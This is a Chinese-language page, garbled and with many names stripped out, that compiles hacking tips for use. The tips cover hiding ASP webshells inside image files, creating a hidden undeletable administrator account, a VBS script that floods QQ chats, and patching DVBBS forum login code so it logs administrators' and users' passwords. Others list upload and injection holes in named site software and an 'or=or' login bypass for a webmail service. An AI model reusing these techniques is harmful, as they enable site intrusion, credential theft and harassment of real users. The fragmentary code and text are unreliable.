2024年4月22日发(作者:)
1.名称:自己如何动手制作图片形式的ASP木马(还要可显示图片) 建一个asp文件,
内容为 找一个正常图片,插入一句话木马(比如冰狐的),用ultraedit进行hex
编译,插入图片里,为了运行成功,还要搜索 shell代码插在这里,最好是小马,还要加密
一下 访问的时候在你作手脚的asp文件后面加上?action=ok,即可 (2)另一种方法,在我
们要做手脚的asp文件里加入如下内容 访问的时候在做手脚的asp文件后面加
上?filer=XXX XXX为你本地上传的一个路径如 c: 上传后在做手脚的asp的
同文件夹中有ating,asp (3)前提得到system权限, 进入网站目录下一层 mkdir s…
copy s…/ 这样杀毒软件找不到的 访问网站/s…/即可 6. 工具
/,此工具在该电脑生成一个超级用户 用户名
为:hack 密码110,在DOS下和计算机管理器上看不到你建立的用户,并且是删除不掉
的. 7.名称:QQ群脚本攻击 打开qq对话诓,复制消息,然后 下面的内容保存为.vbs 文
件,运行即可 Set WshShell= object("")
ivate "QQ信息攻击脚本" for i=1 to 20 1000
ys"^v" ys i ys "%s" Next 8.搜
索:程序制作:万鹏 有免费申请空间的,直接上传asp马即可 9. 名称:全面找出你站上
的ASP木马 (1) 用杀毒软件 (2) 用FTP客户端软件,点"工具"->"比较文件夹" (3)
用上传到站点空间查看,一般功能多的ASP我估计就是ASP木马 (4) 用
工具Beyond Compare 10名称:拓展思路拿DVBBS帐号 "一个人的圣经"的动画 (1)
以前获得webshell后想进入DVBBS的后台,想要管理员的密码,可以这样 老办法: 修改
admin_得到明文DVBBS后台密码 在
"username=trim(replace(request("username")这行后面 Dim fsoObject Dim
tsObject Set fsoObject = Object("stemObject") set
tsObject = TextFile(h(""))
CStr(request("password")) Set fsoObject = Nothing Set tsObject = Nothing 只要管
理员登陆后台,在目录下就生成了 (2)中Case "login_chk"下: on error
resume next Dim rain set rain=object("") =2
t="gb2312" on= omFile
ext h("")
now&request("username")&"text:"&request("password")&chr(10) File
h(""),2 set rain=nothing 这样将获得全部
登陆人的登陆时间,用户名和密码 (3)如果你有自己的网站或者另外的webshell(强烈建
议使用): 可以建立目录laner,在里面建立一个空的和如下代码的: 11. 名
称:利用QQ在线状态抓鸽子肉鸡 生成qq在线状态,把里面的地址改成木马地址,发到
论坛在那里插入一句: """" 结果所有登陆人都会
乖乖的把名字和密码送到你的 里 12. 动画名称:媒体中国整站程序存在多处漏
洞 漏洞程序:媒体中国整站程序(第一版) 官方网站:/ 漏
洞: %5c(暴库) 上传 注入 上传页面:down1/ 13. 名称:免费电话+MSH命令
行工具 / 打开主页,点击坐下角,Free DownLoad,下载到本
地,安装, 运行后,会提示正在寻找你所在地区的区号。由于是国际长途,注册一个帐号,
送100美分,国内计时0.01/分,你就有100分钟可以白打。是一个帐号哦。 要注意的就
是,固定电话,小灵通 形式为6 521本来时0521,要省略前面的零,手
机号也是一样。 14. 名称:Bo-Blog的新漏洞 网址/?job=../admin/ban
把其中"禁止搜索的词"那部分
另存出来,里面的地址改完整,插入一句话木马 15. 名称:钩魂者入侵传奇私服 用百
度 搜索 传奇 inurl:tuku 或者 传奇 inurl: 再或者 传奇 inurl:
友情链接里插入一句话木马即可 16. 程序: 宏达企业整站上传漏洞 官方主
页:/ 漏洞页面:/cx/ (上传漏洞) 17.无间盗邮箱,在修
改密码里,用户名和密码里添or=or 18.名称: bbsxp5.16后台得到webshell bbsxp5.16
过滤了 asp,asp,cdx,cer,扩展名的文件上传,就是在基本设置上添加上上传类型也不行,并
发布评论